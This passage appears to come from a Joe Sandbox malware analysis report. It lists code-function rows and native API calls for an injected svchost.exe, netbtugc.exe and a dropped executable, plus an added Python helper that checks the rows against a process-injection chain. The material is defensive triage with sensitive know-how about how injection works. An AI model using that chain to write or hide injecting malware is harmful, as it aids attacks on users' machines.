            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D68E60 NtReadFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D68F50 NtDeleteFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D68CF0 NtCreateFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D69000 NtClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D69160 NtAllocateVirtualMemory
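            The rows above are the static evidence behind the report's injection-related signatures ("Writes to foreign memory regions", "Maps a DLL or memory area into another process", "Modifies the context of a thread in another process"): the same set of Nt* stubs is referenced from the injected svchost.exe (process 2) and from the netbtugc.exe copy (process 5), in netbtugc.exe even at two different address ranges. Two caveats a triager should keep in mind: these "Code function" rows come from disassembly of functions found in the process image, so they prove that code referencing the stubs is present, not that each call executed (the dynamic signatures are what confirm execution); and eighty rows are easier to judge once they are grouped per process and checked against the injection chain (obtain a target, allocate, write, make executable, hijack a thread, resume). The following Python triage helper does that. It is an added example, not part of the Joe Sandbox report and not FormBook code; the stage grouping is my own, the sample rows are a subset copied from the report above (in both the fused form the extraction produced and the cleaned two-column form), and the reading of the leading number of a function id such as 2_2_03A72E30 as the report's process index is an assumption.

```python
"""Triage helper for Joe Sandbox "Code function" rows.

Added example, not part of the Joe Sandbox report and not FormBook code.
It groups the native-API (Nt*) references per source binary and checks whether
the full process-injection chain is present. The stage names are my own
grouping, not Joe Sandbox terminology.
"""
import re
from collections import defaultdict

# One report row. Accepts the fused form the page extraction produced
# ("...svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30")
# as well as the cleaned two-column form ("...svchost.exe | Code function: ...").
ROW_RE = re.compile(
    r"Source:\s*(?P<source>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<func>\d+_\d+_[0-9A-Fa-f]+)\s*:?\s*(?P<apis>[A-Za-z0-9_,]*)"
)
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")

# Injection chain as the report's dynamic signatures describe it
# (open or create a target, get memory in it, write, make it executable,
# take over a thread, let it run). Grouping is mine.
INJECTION_STAGES = {
    "obtain_target":   {"NtOpenProcess", "NtCreateProcessEx"},
    "allocate":        {"NtAllocateVirtualMemory", "NtCreateSection"},
    "write":           {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "make_executable": {"NtProtectVirtualMemory"},
    "hijack_thread":   {"NtSetContextThread", "NtGetContextThread", "NtQueueApcThread"},
    "resume":          {"NtResumeThread"},
}


def parse_row(line):
    """Return (source, process_index, function_id, [api, ...]) or None for non-rows."""
    m = ROW_RE.search(line)
    if not m:
        return None
    func = m.group("func")
    # The trailing copy of the function id is the report's jump link; drop it.
    apis = [a for a in m.group("apis").split(",") if a and not FUNC_ID_RE.match(a)]
    # Assumption: the leading number of "2_2_03A72E30" is the process index the
    # report uses elsewhere (e.g. memory dumps named 00000002.00000002.*).
    process_index = int(func.split("_")[0])
    return m.group("source").strip(), process_index, func, apis


def summarize(lines):
    """Per source binary: Nt* APIs referenced, other APIs, covered injection
    stages and whether every stage is present."""
    acc = defaultdict(lambda: {"process_index": None, "functions": 0,
                               "nt": set(), "other": set()})
    for line in lines:
        parsed = parse_row(line)
        if parsed is None:
            continue
        source, process_index, _func, apis = parsed
        entry = acc[source]
        entry["process_index"] = process_index
        entry["functions"] += 1
        for api in apis:
            (entry["nt"] if api.startswith("Nt") else entry["other"]).add(api)

    summary = {}
    for source, entry in acc.items():
        stages = {name: sorted(entry["nt"] & members)
                  for name, members in INJECTION_STAGES.items()}
        summary[source] = {
            "process_index": entry["process_index"],
            "functions": entry["functions"],
            "nt_apis": sorted(entry["nt"]),
            "other_apis": sorted(entry["other"]),
            "injection_stages": stages,
            "full_injection_chain": all(stages.values()),
        }
    return summary


# Rows copied from the report (a subset). The first nine are in the fused form
# the extraction produced, the last one in the cleaned two-column form.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D68F50 NtDeleteFile,5_2_02D68F50",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2E30 NtWriteVirtualMemory,5_2_037B2E30",
    r"Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState",
]

if __name__ == "__main__":
    for source, info in summarize(SAMPLE_ROWS).items():
        print(f"[{info['process_index']}] {source}: {info['functions']} functions, "
              f"full injection chain: {info['full_injection_chain']}")
        for stage, apis in info["injection_stages"].items():
            print(f"    {stage:16} {', '.join(apis) or '-'}")
```

            Run against the full list above, the helper reports every stage present for both svchost.exe and netbtugc.exe; against the subset embedded in the block only svchost.exe completes the chain, which is the point of the per-process view: a single NtWriteVirtualMemory reference (the netbtugc.exe sample) is not by itself an injector.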
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004096A0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0042200C
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0041A217
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00412216
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0042435D
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004033C0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004125E8
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044663B
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00413801
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0042096F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004129D0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004119E3
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0041C9AE
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0047EA6F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0040FA10
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044EB5F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00423C81
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00411E78
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00442E0C
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00420EC0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044CF17
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00444FD2
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_040D4608
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A03FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A03FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB9C32
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E2D71
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043EB41D
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043EB464
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043EB45F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E4D44
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_044037B4
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E4B24
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_043E4B1D
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_07151F1F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_0714FF9F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_0715863F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_0715863A
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_07156DCF
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_071585F8
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_0715A44F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_07151CFF
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_07151CF8
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 3_2_0717098F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038403E6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0378E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383A352
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038002C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03820274
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038341A2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038401AA
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038381CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03770100
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0381A118
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03808158
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03812000
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03780770
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037A4750
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0377C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0379C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03840591
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03780535
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0382E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03824420
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03832446
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03836BD7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383AB40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0377EA80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03796962
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0384A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037829A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0378A840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03782840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037AE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037668B8
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037F4F40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037A0F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037C2F28
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0378CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03822F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03772FC8
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037FEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383CE93
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03780E59
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383EE26
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03792E90
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0378AD00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0377ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0381CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03798DBF
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03820CB5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03780C00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03770CF2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0376D34C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383132D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037C739A
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038212ED
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0379B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037852A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0376F172
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037B516C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0378B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0384B16B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0382F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038370E9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037870C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037C5630
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_038316CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0381D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03837571
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03771460
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383F43F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037BDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037F5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383FB76
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0379FB80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037F3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03821AA3
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0381DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0382DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03837A46
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383FA49
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037C5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03789950
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0379B950
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_03815910
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037ED800
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_037838E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0383FF09
